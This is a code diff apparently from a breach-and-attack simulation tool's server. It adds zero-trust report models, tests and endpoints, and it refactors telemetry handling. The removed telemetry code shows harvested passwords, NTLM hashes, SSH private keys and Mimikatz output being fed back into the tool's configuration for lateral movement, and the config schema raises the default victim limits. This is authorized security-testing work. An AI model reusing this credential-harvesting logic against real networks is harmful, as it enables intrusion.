||||||
|
# A finding exists (should be one). Add the event to it.
|
||||||
|
assert len(existing_findings) == 1
|
||||||
|
existing_finding = existing_findings[0]
|
||||||
|
existing_finding.events.append(segmentation_event)
|
||||||
|
if need_to_overwrite_status(existing_finding.status, status):
|
||||||
|
existing_finding.status = status
|
||||||
|
existing_finding.save()
|
|
@ -0,0 +1,53 @@
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
||||||
|
class TestAggregateFinding(IslandTestCase):
|
||||||
|
def test_create_or_add_to_existing(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
test = TEST_MALICIOUS_ACTIVITY_TIMELINE
|
||||||
|
status = STATUS_VERIFY
|
||||||
|
events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)]
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 0)
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)
|
||||||
|
|
||||||
|
def test_create_or_add_to_existing_2_tests_already_exist(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
test = TEST_MALICIOUS_ACTIVITY_TIMELINE
|
||||||
|
status = STATUS_VERIFY
|
||||||
|
event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)
|
||||||
|
events = [event]
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 0)
|
||||||
|
|
||||||
|
Finding.save_finding(test, status, events)
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)
|
||||||
|
|
||||||
|
Finding.save_finding(test, status, events)
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=test, status=status)), 2)
|
||||||
|
|
||||||
|
with self.assertRaises(AssertionError):
|
||||||
|
AggregateFinding.create_or_add_to_existing(test, status, events)
|
|
@ -0,0 +1,32 @@
|
||||||
|
from mongoengine import ValidationError
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
||||||
|
class TestEvent(IslandTestCase):
|
||||||
|
def test_create_event(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
with self.assertRaises(ValidationError):
|
||||||
|
_ = Event.create_event(
|
||||||
|
title=None, # title required
|
||||||
|
message="bla bla",
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
)
|
||||||
|
|
||||||
|
with self.assertRaises(ValidationError):
|
||||||
|
_ = Event.create_event(
|
||||||
|
title="skjs",
|
||||||
|
message="bla bla",
|
||||||
|
event_type="Unknown" # Unknown event type
|
||||||
|
)
|
||||||
|
|
||||||
|
# Assert that nothing is raised.
|
||||||
|
_ = Event.create_event(
|
||||||
|
title="skjs",
|
||||||
|
message="bla bla",
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
)
|
|
@ -0,0 +1,38 @@
|
||||||
|
from mongoengine import ValidationError
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
||||||
|
class TestFinding(IslandTestCase):
|
||||||
|
"""
|
||||||
|
Make sure to set server environment to `testing` in server.json! Otherwise this will mess up your mongo instance and
|
||||||
|
won't work.
|
||||||
|
|
||||||
|
Also, the working directory needs to be the working directory from which you usually run the island so the
|
||||||
|
server.json file is found and loaded.
|
||||||
|
"""
|
||||||
|
def test_save_finding_validation(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
with self.assertRaises(ValidationError):
|
||||||
|
_ = Finding.save_finding(test="bla bla", status=STATUS_FAILED, events=[])
|
||||||
|
|
||||||
|
with self.assertRaises(ValidationError):
|
||||||
|
_ = Finding.save_finding(test=TEST_SEGMENTATION, status="bla bla", events=[])
|
||||||
|
|
||||||
|
def test_save_finding_sanity(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 0)
|
||||||
|
|
||||||
|
event_example = Event.create_event(
|
||||||
|
title="Event Title", message="event message", event_type=EVENT_TYPE_MONKEY_NETWORK)
|
||||||
|
Finding.save_finding(test=TEST_SEGMENTATION, status=STATUS_FAILED, events=[event_example])
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(status=STATUS_FAILED)), 1)
|
|
@ -0,0 +1,52 @@
|
||||||
|
from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding
|
||||||
|
|
||||||
|
|
||||||
|
class TestSegmentationFinding(IslandTestCase):
|
||||||
|
def test_create_or_add_to_existing_finding(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
first_segment = "1.1.1.0/24"
|
||||||
|
second_segment = "2.2.2.0-2.2.2.254"
|
||||||
|
third_segment = "3.3.3.3"
|
||||||
|
event = Event.create_event("bla", "bla", EVENT_TYPE_MONKEY_NETWORK)
|
||||||
|
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
subnets=[first_segment, second_segment],
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
segmentation_event=event
|
||||||
|
)
|
||||||
|
|
||||||
|
self.assertEquals(len(SegmentationFinding.objects()), 1)
|
||||||
|
self.assertEquals(len(SegmentationFinding.objects()[0].events), 1)
|
||||||
|
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
# !!! REVERSE ORDER
|
||||||
|
subnets=[second_segment, first_segment],
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
segmentation_event=event
|
||||||
|
)
|
||||||
|
|
||||||
|
self.assertEquals(len(SegmentationFinding.objects()), 1)
|
||||||
|
self.assertEquals(len(SegmentationFinding.objects()[0].events), 2)
|
||||||
|
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
# !!! REVERSE ORDER
|
||||||
|
subnets=[first_segment, third_segment],
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
segmentation_event=event
|
||||||
|
)
|
||||||
|
|
||||||
|
self.assertEquals(len(SegmentationFinding.objects()), 2)
|
||||||
|
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
# !!! REVERSE ORDER
|
||||||
|
subnets=[second_segment, third_segment],
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
segmentation_event=event
|
||||||
|
)
|
||||||
|
|
||||||
|
self.assertEquals(len(SegmentationFinding.objects()), 3)
|
|
@ -1,13 +0,0 @@
|
||||||
import flask_restful
|
|
||||||
|
|
||||||
from monkey_island.cc.auth import jwt_required
|
|
||||||
from monkey_island.cc.services.report import ReportService
|
|
||||||
|
|
||||||
__author__ = "itay.mizeretz"
|
|
||||||
|
|
||||||
|
|
||||||
class Report(flask_restful.Resource):
|
|
||||||
|
|
||||||
@jwt_required()
|
|
||||||
def get(self):
|
|
||||||
return ReportService.get_report()
|
|
|
@ -0,0 +1,41 @@
|
||||||
|
import httplib
|
||||||
|
|
||||||
|
|
||||||
|
import flask_restful
|
||||||
|
from flask import jsonify
|
||||||
|
|
||||||
|
from monkey_island.cc.auth import jwt_required
|
||||||
|
from monkey_island.cc.services.reporting.report import ReportService
|
||||||
|
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
|
||||||
|
|
||||||
|
ZERO_TRUST_REPORT_TYPE = "zero_trust"
|
||||||
|
SECURITY_REPORT_TYPE = "security"
|
||||||
|
REPORT_TYPES = [SECURITY_REPORT_TYPE, ZERO_TRUST_REPORT_TYPE]
|
||||||
|
|
||||||
|
REPORT_DATA_PILLARS = "pillars"
|
||||||
|
REPORT_DATA_FINDINGS = "findings"
|
||||||
|
REPORT_DATA_PRINCIPLES_STATUS = "principles"
|
||||||
|
|
||||||
|
__author__ = ["itay.mizeretz", "shay.nehmad"]
|
||||||
|
|
||||||
|
|
||||||
|
class Report(flask_restful.Resource):
|
||||||
|
|
||||||
|
@jwt_required()
|
||||||
|
def get(self, report_type=SECURITY_REPORT_TYPE, report_data=None):
|
||||||
|
if report_type == SECURITY_REPORT_TYPE:
|
||||||
|
return ReportService.get_report()
|
||||||
|
elif report_type == ZERO_TRUST_REPORT_TYPE:
|
||||||
|
if report_data == REPORT_DATA_PILLARS:
|
||||||
|
return jsonify({
|
||||||
|
"statusesToPillars": ZeroTrustService.get_statuses_to_pillars(),
|
||||||
|
"pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(),
|
||||||
|
"grades": ZeroTrustService.get_pillars_grades()
|
||||||
|
}
|
||||||
|
)
|
||||||
|
elif report_data == REPORT_DATA_PRINCIPLES_STATUS:
|
||||||
|
return jsonify(ZeroTrustService.get_principles_status())
|
||||||
|
elif report_data == REPORT_DATA_FINDINGS:
|
||||||
|
return jsonify(ZeroTrustService.get_all_findings())
|
||||||
|
|
||||||
|
flask_restful.abort(httplib.NOT_FOUND)
|
|
@ -7,7 +7,7 @@ from flask import request, make_response, jsonify
|
||||||
from monkey_island.cc.auth import jwt_required
|
from monkey_island.cc.auth import jwt_required
|
||||||
from monkey_island.cc.database import mongo
|
from monkey_island.cc.database import mongo
|
||||||
from monkey_island.cc.services.node import NodeService
|
from monkey_island.cc.services.node import NodeService
|
||||||
from monkey_island.cc.services.report import ReportService
|
from monkey_island.cc.services.reporting.report import ReportService
|
||||||
from monkey_island.cc.services.attack.attack_report import AttackReportService
|
from monkey_island.cc.services.attack.attack_report import AttackReportService
|
||||||
from monkey_island.cc.utils import local_ip_addresses
|
from monkey_island.cc.utils import local_ip_addresses
|
||||||
from monkey_island.cc.services.database import Database
|
from monkey_island.cc.services.database import Database
|
||||||
|
|
|
@ -1,6 +1,5 @@
|
||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
import copy
|
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
|
|
||||||
import dateutil
|
import dateutil
|
||||||
|
@ -9,12 +8,8 @@ from flask import request
|
||||||
|
|
||||||
from monkey_island.cc.auth import jwt_required
|
from monkey_island.cc.auth import jwt_required
|
||||||
from monkey_island.cc.database import mongo
|
from monkey_island.cc.database import mongo
|
||||||
from monkey_island.cc.services import mimikatz_utils
|
|
||||||
from monkey_island.cc.services.config import ConfigService
|
|
||||||
from monkey_island.cc.services.edge import EdgeService
|
|
||||||
from monkey_island.cc.services.node import NodeService
|
from monkey_island.cc.services.node import NodeService
|
||||||
from monkey_island.cc.encryptor import encryptor
|
from monkey_island.cc.services.telemetry.processing.processing import process_telemetry
|
||||||
from monkey_island.cc.services.wmi_handler import WMIHandler
|
|
||||||
from monkey_island.cc.models.monkey import Monkey
|
from monkey_island.cc.models.monkey import Monkey
|
||||||
|
|
||||||
__author__ = 'Barak'
|
__author__ = 'Barak'
|
||||||
|
@ -54,16 +49,9 @@ class Telemetry(flask_restful.Resource):
|
||||||
Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']).renew_ttl()
|
Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']).renew_ttl()
|
||||||
|
|
||||||
monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
NodeService.update_monkey_modify_time(monkey["_id"])
|
||||||
|
|
||||||
try:
|
process_telemetry(telemetry_json)
|
||||||
NodeService.update_monkey_modify_time(monkey["_id"])
|
|
||||||
telem_category = telemetry_json.get('telem_category')
|
|
||||||
if telem_category in TELEM_PROCESS_DICT:
|
|
||||||
TELEM_PROCESS_DICT[telem_category](telemetry_json)
|
|
||||||
else:
|
|
||||||
logger.info('Got unknown type of telemetry: %s' % telem_category)
|
|
||||||
except Exception as ex:
|
|
||||||
logger.error("Exception caught while processing telemetry. Info: {}".format(ex.message), exc_info=True)
|
|
||||||
|
|
||||||
telem_id = mongo.db.telemetry.insert(telemetry_json)
|
telem_id = mongo.db.telemetry.insert(telemetry_json)
|
||||||
return mongo.db.telemetry.find_one_or_404({"_id": telem_id})
|
return mongo.db.telemetry.find_one_or_404({"_id": telem_id})
|
||||||
|
@ -90,200 +78,3 @@ class Telemetry(flask_restful.Resource):
|
||||||
x['data']['credentials'][new_user] = x['data']['credentials'].pop(user)
|
x['data']['credentials'][new_user] = x['data']['credentials'].pop(user)
|
||||||
|
|
||||||
return objects
|
return objects
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
|
|
||||||
dst_ip = telemetry_json['data']['machine']['ip_addr']
|
|
||||||
dst_domain_name = telemetry_json['data']['machine']['domain_name']
|
|
||||||
src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
|
||||||
dst_node = NodeService.get_monkey_by_ip(dst_ip)
|
|
||||||
if dst_node is None:
|
|
||||||
dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)
|
|
||||||
|
|
||||||
return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_tunnel_telemetry(telemetry_json):
|
|
||||||
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"]
|
|
||||||
if telemetry_json['data']['proxy'] is not None:
|
|
||||||
tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
|
|
||||||
NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip)
|
|
||||||
else:
|
|
||||||
NodeService.unset_all_monkey_tunnels(monkey_id)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_state_telemetry(telemetry_json):
|
|
||||||
monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
|
||||||
NodeService.add_communication_info(monkey, telemetry_json['command_control_channel'])
|
|
||||||
if telemetry_json['data']['done']:
|
|
||||||
NodeService.set_monkey_dead(monkey, True)
|
|
||||||
else:
|
|
||||||
NodeService.set_monkey_dead(monkey, False)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_exploit_telemetry(telemetry_json):
|
|
||||||
edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
|
||||||
Telemetry.encrypt_exploit_creds(telemetry_json)
|
|
||||||
telemetry_json['data']['info']['started'] = dateutil.parser.parse(telemetry_json['data']['info']['started'])
|
|
||||||
telemetry_json['data']['info']['finished'] = dateutil.parser.parse(telemetry_json['data']['info']['finished'])
|
|
||||||
|
|
||||||
new_exploit = copy.deepcopy(telemetry_json['data'])
|
|
||||||
|
|
||||||
new_exploit.pop('machine')
|
|
||||||
new_exploit['timestamp'] = telemetry_json['timestamp']
|
|
||||||
|
|
||||||
mongo.db.edge.update(
|
|
||||||
{'_id': edge['_id']},
|
|
||||||
{'$push': {'exploits': new_exploit}}
|
|
||||||
)
|
|
||||||
if new_exploit['result']:
|
|
||||||
EdgeService.set_edge_exploited(edge)
|
|
||||||
|
|
||||||
for attempt in telemetry_json['data']['attempts']:
|
|
||||||
if attempt['result']:
|
|
||||||
found_creds = {'user': attempt['user']}
|
|
||||||
for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']:
|
|
||||||
if len(attempt[field]) != 0:
|
|
||||||
found_creds[field] = attempt[field]
|
|
||||||
NodeService.add_credentials_to_node(edge['to'], found_creds)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_scan_telemetry(telemetry_json):
|
|
||||||
edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
|
||||||
data = copy.deepcopy(telemetry_json['data']['machine'])
|
|
||||||
ip_address = data.pop("ip_addr")
|
|
||||||
domain_name = data.pop("domain_name")
|
|
||||||
new_scan = \
|
|
||||||
{
|
|
||||||
"timestamp": telemetry_json["timestamp"],
|
|
||||||
"data": data
|
|
||||||
}
|
|
||||||
mongo.db.edge.update(
|
|
||||||
{"_id": edge["_id"]},
|
|
||||||
{"$push": {"scans": new_scan},
|
|
||||||
"$set": {"ip_address": ip_address, 'domain_name': domain_name}}
|
|
||||||
)
|
|
||||||
|
|
||||||
node = mongo.db.node.find_one({"_id": edge["to"]})
|
|
||||||
if node is not None:
|
|
||||||
scan_os = new_scan["data"]["os"]
|
|
||||||
if "type" in scan_os:
|
|
||||||
mongo.db.node.update({"_id": node["_id"]},
|
|
||||||
{"$set": {"os.type": scan_os["type"]}},
|
|
||||||
upsert=False)
|
|
||||||
if "version" in scan_os:
|
|
||||||
mongo.db.node.update({"_id": node["_id"]},
|
|
||||||
{"$set": {"os.version": scan_os["version"]}},
|
|
||||||
upsert=False)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_system_info_telemetry(telemetry_json):
|
|
||||||
users_secrets = {}
|
|
||||||
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
|
|
||||||
if 'ssh_info' in telemetry_json['data']:
|
|
||||||
ssh_info = telemetry_json['data']['ssh_info']
|
|
||||||
Telemetry.encrypt_system_info_ssh_keys(ssh_info)
|
|
||||||
if telemetry_json['data']['network_info']['networks']:
|
|
||||||
# We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
|
|
||||||
Telemetry.add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
|
|
||||||
Telemetry.add_system_info_ssh_keys_to_config(ssh_info)
|
|
||||||
if 'credentials' in telemetry_json['data']:
|
|
||||||
creds = telemetry_json['data']['credentials']
|
|
||||||
Telemetry.encrypt_system_info_creds(creds)
|
|
||||||
Telemetry.add_system_info_creds_to_config(creds)
|
|
||||||
Telemetry.replace_user_dot_with_comma(creds)
|
|
||||||
if 'mimikatz' in telemetry_json['data']:
|
|
||||||
users_secrets = mimikatz_utils.MimikatzSecrets. \
|
|
||||||
extract_secrets_from_mimikatz(telemetry_json['data'].get('mimikatz', ''))
|
|
||||||
if 'wmi' in telemetry_json['data']:
|
|
||||||
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
|
|
||||||
wmi_handler.process_and_handle_wmi_info()
|
|
||||||
if 'aws' in telemetry_json['data']:
|
|
||||||
if 'instance_id' in telemetry_json['data']['aws']:
|
|
||||||
mongo.db.monkey.update_one({'_id': monkey_id},
|
|
||||||
{'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def add_ip_to_ssh_keys(ip, ssh_info):
|
|
||||||
for key in ssh_info:
|
|
||||||
key['ip'] = ip['addr']
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_trace_telemetry(telemetry_json):
|
|
||||||
# Nothing to do
|
|
||||||
return
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def replace_user_dot_with_comma(creds):
|
|
||||||
for user in creds:
|
|
||||||
if -1 != user.find('.'):
|
|
||||||
new_user = user.replace('.', ',')
|
|
||||||
creds[new_user] = creds.pop(user)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def encrypt_system_info_creds(creds):
|
|
||||||
for user in creds:
|
|
||||||
for field in ['password', 'lm_hash', 'ntlm_hash']:
|
|
||||||
if field in creds[user]:
|
|
||||||
# this encoding is because we might run into passwords which are not pure ASCII
|
|
||||||
creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8'))
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def encrypt_system_info_ssh_keys(ssh_info):
|
|
||||||
for idx, user in enumerate(ssh_info):
|
|
||||||
for field in ['public_key', 'private_key', 'known_hosts']:
|
|
||||||
if ssh_info[idx][field]:
|
|
||||||
ssh_info[idx][field] = encryptor.enc(ssh_info[idx][field].encode('utf-8'))
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def add_system_info_creds_to_config(creds):
|
|
||||||
for user in creds:
|
|
||||||
ConfigService.creds_add_username(user)
|
|
||||||
if 'password' in creds[user]:
|
|
||||||
ConfigService.creds_add_password(creds[user]['password'])
|
|
||||||
if 'lm_hash' in creds[user]:
|
|
||||||
ConfigService.creds_add_lm_hash(creds[user]['lm_hash'])
|
|
||||||
if 'ntlm_hash' in creds[user]:
|
|
||||||
ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash'])
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def add_system_info_ssh_keys_to_config(ssh_info):
|
|
||||||
for user in ssh_info:
|
|
||||||
ConfigService.creds_add_username(user['name'])
|
|
||||||
# Public key is useless without private key
|
|
||||||
if user['public_key'] and user['private_key']:
|
|
||||||
ConfigService.ssh_add_keys(user['public_key'], user['private_key'],
|
|
||||||
user['name'], user['ip'])
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def encrypt_exploit_creds(telemetry_json):
|
|
||||||
attempts = telemetry_json['data']['attempts']
|
|
||||||
for i in range(len(attempts)):
|
|
||||||
for field in ['password', 'lm_hash', 'ntlm_hash']:
|
|
||||||
credential = attempts[i][field]
|
|
||||||
if len(credential) > 0:
|
|
||||||
attempts[i][field] = encryptor.enc(credential.encode('utf-8'))
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_post_breach_telemetry(telemetry_json):
|
|
||||||
mongo.db.monkey.update(
|
|
||||||
{'guid': telemetry_json['monkey_guid']},
|
|
||||||
{'$push': {'pba_results': telemetry_json['data']}})
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def process_attack_telemetry(telemetry_json):
|
|
||||||
# No processing required
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
TELEM_PROCESS_DICT = \
|
|
||||||
{
|
|
||||||
'tunnel': Telemetry.process_tunnel_telemetry,
|
|
||||||
'state': Telemetry.process_state_telemetry,
|
|
||||||
'exploit': Telemetry.process_exploit_telemetry,
|
|
||||||
'scan': Telemetry.process_scan_telemetry,
|
|
||||||
'system_info': Telemetry.process_system_info_telemetry,
|
|
||||||
'trace': Telemetry.process_trace_telemetry,
|
|
||||||
'post_breach': Telemetry.process_post_breach_telemetry,
|
|
||||||
'attack': Telemetry.process_attack_telemetry
|
|
||||||
}
|
|
||||||
|
|
|
@ -111,6 +111,14 @@ SCHEMA = {
|
||||||
"title": "Back door user",
|
"title": "Back door user",
|
||||||
"attack_techniques": []
|
"attack_techniques": []
|
||||||
},
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"CommunicateAsNewUser"
|
||||||
|
],
|
||||||
|
"title": "Communicate as new user",
|
||||||
|
"attack_techniques": []
|
||||||
|
},
|
||||||
],
|
],
|
||||||
},
|
},
|
||||||
"finger_classes": {
|
"finger_classes": {
|
||||||
|
@ -329,6 +337,7 @@ SCHEMA = {
|
||||||
"$ref": "#/definitions/post_breach_acts"
|
"$ref": "#/definitions/post_breach_acts"
|
||||||
},
|
},
|
||||||
"default": [
|
"default": [
|
||||||
|
"CommunicateAsNewUser"
|
||||||
],
|
],
|
||||||
"description": "List of actions the Monkey will run post breach"
|
"description": "List of actions the Monkey will run post breach"
|
||||||
},
|
},
|
||||||
|
@ -439,13 +448,13 @@ SCHEMA = {
|
||||||
"victims_max_find": {
|
"victims_max_find": {
|
||||||
"title": "Max victims to find",
|
"title": "Max victims to find",
|
||||||
"type": "integer",
|
"type": "integer",
|
||||||
"default": 30,
|
"default": 100,
|
||||||
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
||||||
},
|
},
|
||||||
"victims_max_exploit": {
|
"victims_max_exploit": {
|
||||||
"title": "Max victims to exploit",
|
"title": "Max victims to exploit",
|
||||||
"type": "integer",
|
"type": "integer",
|
||||||
"default": 7,
|
"default": 15,
|
||||||
"description":
|
"description":
|
||||||
"Determines the maximum number of machines the monkey"
|
"Determines the maximum number of machines the monkey"
|
||||||
" is allowed to successfully exploit. " + WARNING_SIGN
|
" is allowed to successfully exploit. " + WARNING_SIGN
|
||||||
|
|
|
@ -0,0 +1,5 @@
|
||||||
|
from monkey_island.cc.services.config import ConfigService
|
||||||
|
|
||||||
|
|
||||||
|
def get_config_network_segments_as_subnet_groups():
|
||||||
|
return [ConfigService.get_config_value(['basic_network', 'network_analysis', 'inaccessible_subnets'])]
|
|
@ -9,14 +9,16 @@ from enum import Enum
|
||||||
|
|
||||||
from six import text_type
|
from six import text_type
|
||||||
|
|
||||||
|
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
|
||||||
from monkey_island.cc.database import mongo
|
from monkey_island.cc.database import mongo
|
||||||
from monkey_island.cc.models import Monkey
|
from monkey_island.cc.models import Monkey
|
||||||
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
|
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
|
||||||
from monkey_island.cc.services.config import ConfigService
|
from monkey_island.cc.services.config import ConfigService
|
||||||
|
from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
|
||||||
from monkey_island.cc.services.edge import EdgeService
|
from monkey_island.cc.services.edge import EdgeService
|
||||||
from monkey_island.cc.services.node import NodeService
|
from monkey_island.cc.services.node import NodeService
|
||||||
from monkey_island.cc.utils import local_ip_addresses, get_subnets
|
from monkey_island.cc.utils import local_ip_addresses, get_subnets
|
||||||
from monkey_island.cc.services.pth_report import PTHReportService
|
from monkey_island.cc.services.reporting.pth_report import PTHReportService
|
||||||
from common.network.network_range import NetworkRange
|
from common.network.network_range import NetworkRange
|
||||||
|
|
||||||
__author__ = "itay.mizeretz"
|
__author__ = "itay.mizeretz"
|
||||||
|
@ -415,23 +417,6 @@ class ReportService:
|
||||||
|
|
||||||
return issues
|
return issues
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
|
|
||||||
"""
|
|
||||||
Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
|
|
||||||
:param ip_addresses: List of IP addresses to test.
|
|
||||||
:param source_subnet: Subnet to want an IP to not be in.
|
|
||||||
:param target_subnet: Subnet we want an IP to be in.
|
|
||||||
:return:
|
|
||||||
"""
|
|
||||||
for ip_address in ip_addresses:
|
|
||||||
if target_subnet.is_in_range(ip_address):
|
|
||||||
return None
|
|
||||||
for ip_address in ip_addresses:
|
|
||||||
if source_subnet.is_in_range(ip_address):
|
|
||||||
return ip_address
|
|
||||||
return None
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_cross_segment_issues_of_single_machine(source_subnet_range, target_subnet_range):
|
def get_cross_segment_issues_of_single_machine(source_subnet_range, target_subnet_range):
|
||||||
"""
|
"""
|
||||||
|
@ -494,9 +479,9 @@ class ReportService:
|
||||||
target_ip = scan['data']['machine']['ip_addr']
|
target_ip = scan['data']['machine']['ip_addr']
|
||||||
if target_subnet_range.is_in_range(text_type(target_ip)):
|
if target_subnet_range.is_in_range(text_type(target_ip)):
|
||||||
monkey = NodeService.get_monkey_by_guid(scan['monkey_guid'])
|
monkey = NodeService.get_monkey_by_guid(scan['monkey_guid'])
|
||||||
cross_segment_ip = ReportService.get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
|
cross_segment_ip = get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
|
||||||
source_subnet_range,
|
source_subnet_range,
|
||||||
target_subnet_range)
|
target_subnet_range)
|
||||||
|
|
||||||
if cross_segment_ip is not None:
|
if cross_segment_ip is not None:
|
||||||
cross_segment_issues.append(
|
cross_segment_issues.append(
|
||||||
|
@ -544,7 +529,7 @@ class ReportService:
|
||||||
cross_segment_issues = []
|
cross_segment_issues = []
|
||||||
|
|
||||||
# For now the feature is limited to 1 group.
|
# For now the feature is limited to 1 group.
|
||||||
subnet_groups = [ConfigService.get_config_value(['basic_network', 'network_analysis', 'inaccessible_subnets'])]
|
